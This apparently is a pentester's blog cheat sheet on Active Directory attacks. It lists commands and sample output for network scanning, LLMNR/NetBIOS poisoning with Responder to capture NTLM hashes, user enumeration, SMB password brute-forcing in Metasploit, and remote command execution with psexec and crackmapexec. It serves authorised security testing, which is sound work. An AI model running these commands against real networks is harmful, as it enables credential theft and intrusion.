Enumerating AD infrastructure

Mohit Panwar
4 min readDec 13, 2018

First Things First

###############

Discover the endpoints in the network

­Nmap -script broadcast-dhcp-discover

­Nbtscan <Network subnet>

— — —

Attack Surface scanning

A pentester should always scan/test hosted applications/services to get into the domain infrastructure. Hacking Domain Services is one part of the story but testing any Web Application and/or any other listening port on the server is also important.

­Nmap -sC -sV -p- target/network-subnet -oA <dir>

— — —

DNS scan

This will give you a Fully Identifiable Domain Name (FQDN) for the IP address and other information about the roles of the target machine.

­Dig -t SRV _gc._tcp.<domain fqdn>

Dig -t SRV _ldap._tcp.<domain fqdn>

Dig -t SRV _kerberos._tcp.<domain fqdn>

Dig -t SRV _kpasswd._tcp.<endpoint fqdn>

­Nmap — script dns-srv-enum –script-args “dns-srv-enum.domain=’<domain fqdn>’”

— — —

NetBIOS and LLMNR poisoning:

You might be very lucky to sniff any NT/NTLM hashes with Responder. Once you have the hast, feed it to the hashcat program as mentioned in this blog or use it with Empire to do pass-the-hash.

­Responder -I eth0 -wrf

###############

Getting AD Specific Info

###############

Anonymous/Credentialed LDAP data dump

If you are using Windows for your recon, use LDAP tool to do Anonymous/Credentialed LDAP data dump or use ldapsearch in kali as mentioned below:

ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’

— — —

Netbios:

Identify NetBIOS names of the endpoints. This will give you a Fully Identifiable Domain Name (FQDN) for the IP address.

Windows # Nbtstat -a <IP>

Linux # Nmblookup -A <IP>

— — —

Enumerating Users:

­Enum4linux -a <IP> or

Enum4linux -u administrator -p password -a target-ip

Try using anonymous login for RPC login.

­Rpcclient -U “” -N <IP>

­Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm=’<domain>’,userdb=/root/Desktop/usernames.txt <IP>

PORT   STATE SERVICE      REASON
88/tcp open kerberos-sec syn-ack
| krb5-enum-users:
| Discovered Kerberos principals
| administrator@test
| mysql@test
|_ tomcat@test

Using bruteforce on Kerberos using metasploit can be very efficient but time consuming. You can use this as a last resort.

msf > use Auxiliary/gather/Kerberos_enumusers

Username brute-force with Kerberos.

You can also use GetADUsers.py from Impacket to enumerate all users on the server if you have valid credentials with you.

GetADUsers.py -all <domain\User> -dc-ip <DC_IP>

— — —

Password Bruteforce:

­Auxiliary/scanner/smb/smb_login

msf auxiliary(smb_login) > set PASS_FILE   /usr/share/wordlists/ rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf auxiliary(smb_login) > set USER_FILE /root/Desktop/users.txt
USER_FILE => /root/Desktop/users.txt
msf auxiliary(smb_login) > set RHOSTS 192.168.1.2-10
RHOSTS => 192.168.1.2-10
msf auxiliary(smb_login) > set THREADS 8
THREADS => 8
msf auxiliary(smb_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(smb_login) > run

[-] 192.168.1.2 - FAILED LOGIN (Windows 7 Enterprise 7600) Administrator : (STATUS_ACCOUNT_DISABLED)
[*] 192.168.1.2 - GUEST LOGIN (Windows 7 Enterprise 7600) dale :
[+] 192.168.1.2 - SUCCESSFUL LOGIN (Windows 7 Enterprise 7600) 'Administrator' : 's3cr3t'
[+] 192.168.1.3 - SUCCESSFUL LOGIN (Windows 7 Enterprise 7600) 'Administrator' : 's3cr3t'
[*] Scanned 7 of 9 hosts
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >

­Kinit_horizontal_brute.sh <domain> <IP> <username file> <password>

— — —

Exploring SMB shares

List out all the available shared paths on the Target server.

­smbclient -L \\Domain_Name -I <DC_IP> -N

Check if any of the shared paths is writable. If any shared path is writable with known account credential, we can use Psexec for Remote command execution.

smbclient //<share path> -I <DC_IP> -N

­

If any path is writable, move directly to the exec.py from Impacket withe below

python /opt/impacket/examples/psexec.py <domain/user>:<password>@<server ip>

Using crackmapexec(CME) to enumerate shares. CME is a very useful framework to automate enumeration and post exploitation. Wait for upcoming series for automating AD enumeration for more.

crackmapexec <IP> -u ‘<domain\username>’ -p ‘<password>’ --local-auth --shares

###############

Important note: If any of the above test gives a negative result, keep an eye on your Wireshark traffic. Mostly setting up static DHCP or DNS or Gateway IP address solves such issues. This is a very small thing to underestimate which will affect the pentest in a peculiar way.

###############

Shout Outs:

--

--

Mohit Panwar

Cyber Security professional | AppSec | Secure SDLC